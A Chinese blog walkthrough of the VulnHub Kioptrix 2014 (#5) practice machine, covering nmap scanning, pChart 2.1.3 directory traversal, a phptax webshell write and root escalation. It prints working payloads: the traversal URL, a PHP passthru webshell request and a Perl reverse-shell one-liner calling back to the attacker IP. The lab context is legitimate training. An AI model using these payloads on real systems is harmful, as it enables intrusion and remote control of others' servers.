KIOPTRIX: LEVEL 1.4-VulnHub靶机学习第六篇

最新推荐文章于 2024-07-06 07:51:21 发布
最新推荐文章于 2024-07-06 07:51:21 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: VnlnHub学习之旅 文章标签: 安全 web安全 kali 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27466929/article/details/126859357
版权

 写在前面:前人栽树后人乘凉,谢谢网上各位大佬的解题思路作为参考学习;这是kioptrix系列最后一篇咯~

一、实验准备

        1、实验地址:Kioptrix: 2014 (#5) ~ VulnHub

        2、下载之后,本地解压,用VMware运行该虚拟机;

        

        3、设置Kioptrix Level 1.4与攻击机网络环境,保证在同一局域网;

                         

        4、本实验攻击机使用的是Kali Linux;攻击机IP地址:10.10.10.131

二、情报收集

        1、主机&端口&服务扫描;

                - Apache version 2.2.21

┌──(root💀kali)-[~]
└─# nmap -sP 10.10.10.0/24
Nmap scan report for 10.10.10.151 (10.10.10.151)
Host is up (0.00026s latency).
MAC Address: 00:0C:29:3C:66:82 (VMware)

┌──(root💀kali)-[~]
└─# nmap -sV -p1-65535 10.10.10.151
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:3C:66:82 (VMware)

        2、访问80端口

                - view source;

        

         

                 - dirsearch目录扫描;

┌──(root💀kali)-[~]
└─# dirsearch -u "http://10.10.10.151/pChart2.1.3" -e php
[08:34:44] 200 -   12KB - /pChart2.1.3/readme.txt    # --> 确认pChart应用版本2.1.3;
# 根目录扫描无可用信息;

                - 搜索pChart2.1.3漏洞;得到目录穿越&XSS漏洞;

┌──(root💀kali)-[~]
└─# searchsploit pchart     
-----------------------------------------------------------------------
Exploit Title                                  |  Path                                                                                                                         
-----------------------------------------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities        | php/webapps/31173.txt                                                                                        
-----------------------------------------------------------------------
┌──(root💀kali)-[~]
└─# locate php/webapps/31173.txt 
/usr/share/exploitdb/exploits/php/webapps/31173.txt
┌──(root💀kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/31173.txt

         3、访问8080端口;没有权限;先尝试利用目录穿越突破80端口;

        

 三、渗透测试:STEP1

        1、尝试突破80端口,获取有效信息;

                - 系统版本FreeBSD 9.0

                - 只能读取准确路径下的文件,通过网络搜索引擎可知,FreeBSD系统下httpd.conf的保存路径为:/usr/local/etc/apache版本号/httpd.conf, 但此前获得的21版本无效,后续尝试目录爆破;

         2、利用pChart2.1.3漏洞读取httpd.conf文件;

                 - 访问http://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/

local/etc/apache22/httpd.conf,获得如下信息:访问8080端口,需要更改User-Agent头;

        

         3、访问8080端口,收集情报;

        

                - 获得另外一个应用phptax,先尝试漏洞搜索;

                - 21833.rb尝试过了,大概是因为EXP源码中没有User-Agent头部的原因,没有利用成功,又不会自己编写EXP,只能放弃;

                - 25849.txt提供了一个木马写入的shell:

32: fwrite fwrite($zz, "$_GET['newvalue']");
#LINE 31: $zz = fopen("./data/$field", "w");
#LINE  2: $field = $_GET['field'];
# 文件被写入当前目录下的data文件夹中;

$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";
# passthru()函数可以直接在浏览器返回命令执行结果;

                - 21665.txt提供了命令执行的参数,但是攻击机的nc监听不上,所以暂时放弃;有大佬知道的话希望不吝赐教;

四、渗透测试:STEP二

        1、上传shell

        - 综上所述,我们尝试25849.txt中的方法,上传木马然后getshell;

        

        - antsword连接的时候记得添加User-Agent头,连接之后没有明显的提示文件;                      ​​​

         

         2、上传EXP提权

        方案一:直接使用antsword提权;

                - gcc 28718.c -o 28718

                - 虽然提权成功,但是需要退出终端重新打开才能获取root权限,可以less读取/root/congrats.txt 

        

        

--------------------------------------------------------------------------------------------------------------------------------

         方案二:无意间在github发现了一个EXP,附链接;

                - GitHub - NHPT/phptaxExploit

                - 开启监听端口;nc -lvnp 23235

                - 该EXP通过perl反弹shell,使用时,记得URL编码,如下:

perl -e 'use Socket;$i="10.10.10.131";$p=23235;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

                - 效果如图所示;

        

         

 五、写在最后

        这个靶机,包括些博客截图所需,拢共跑了两次,每次都有纠结的地方;

        - 首先我们观察最后python写的这个EXP,用的是开始我没有试验出来的21665.txt中所述的点;才意识到靶机应该是对nc的shell反弹做了限制;

        - 其次普通一句话🐴好像并不能用于antsword的连接;

        - 第一次做的时候针对httpd.conf得路径也是一脸懵,写这个blog的时候才想起可以用burp模糊注入跑到/usr/local/etc/apache?/目录;

        - 学无止境,加油吧!

迷の泰坦
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站攻击+提权基本步骤
weixin_47691728的博客
06-28 3275
网站攻击+提权基本步骤
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1045
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
pchart2.1.3 图表
06-13
pChart是一个免费的PHP图表生成库,可以生成多种图表如饼图或者柱状图等等,需要GD库的支持
OSCP-Kioptrix2014-2 漏洞利用
weixin_30383279的博客
06-28 360
pChart 2.1.3 文件包含漏洞 搜索漏洞 查看漏洞理由代码: hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd 之前的8080端口禁止访问,看看apache的配置: http://192.168.1.78/pChart2.1.3/examples/...
Kioptrix 2014 (#5)
MD@@nr丫卡uer
12-11 505
目标:Kioptrix 2014 (#5) 攻击机:kali(192.168.1.107) 网关:192.168.1.255 #1端口探测 nmap 192.168.1.159 -O -sV -sS -O 系统探测 -sV 探测开启的端口来获取服务、版本信息 -sS 使用SYN扫描 #2访问80和8080端口 查看网页源代码 访问 http://192.168.1.159/pChart2.1.3/examples/index.php 找一下Navigation漏.
VulnHub-Kioptrix2014(#5)
热门推荐
江左盟的博客
07-21 1万+
信息收集 是 啊 啊 啊
KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇
qq_27466929的博客
09-11 1206
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.3
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub靶机渗透 Kioptrix1.3
RestoreJustice的博客
03-18 199
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.135,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.135。经测试登录处password参数存在SQL注入,并且爆出网站绝对路径:/var/www/
【Oscp备考-Kioptrix2】
weixin_44126257的博客
09-16 1919
Oscp备考:Kioptrix Level 2
【原】Pchart生成图片
weixin_30439067的博客
06-07 128
学习网址: http://wiki.pchart.net/doc.introduction.html http://pchart.sourceforge.net/index.php 转载于:https://www.cnblogs.com/HYanqing/p/9150716.html
pChart的使用总结
weixin_34019144的博客
05-23 1986
2019独角兽企业重金招聘Python工程师标准>>> ...
Vulnhub系列-Kioptrix-Level-5
Yasso的博客
12-22 312
靶机:192.168.249.134 kali: 192.168.249.132 一、信息收集 ufs:/dev/ada0p2 —指定根分区启动系统 这样指定根分区启动成功 –靶机变为login才算打开— nmap -sV 192.168.249.134 —查看开放端口 —访问下80端口— <查看源代码> <看到URL访问下> —搜下有无pChart 2.1.3的漏洞— <貌似是个目录遍历漏洞和xss,看下exp怎么利用> 先玩玩XSS,刚开始以为是反射型 测试
PChart使用经验
Innovation Tan的专栏
06-24 3742
前几天写了个web,来统计测试结果,因为数字没有图形来的直观,所以网上搜索了下发现PChart是个好东西,易于上手也比较好看。现在的PCahrt已经到2.1.3了,大概10多个class类。下面几个步骤来生成pchart图表,有兴趣的朋友一起研究研究。 1. 先写个函数来fetch data 从数据库。 $q=$_GET["q"]; my_chart($q); function my_ch
VPS拨号服务器:独享的高效与安全
最新发布
qq_34245974的博客
07-06 667
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值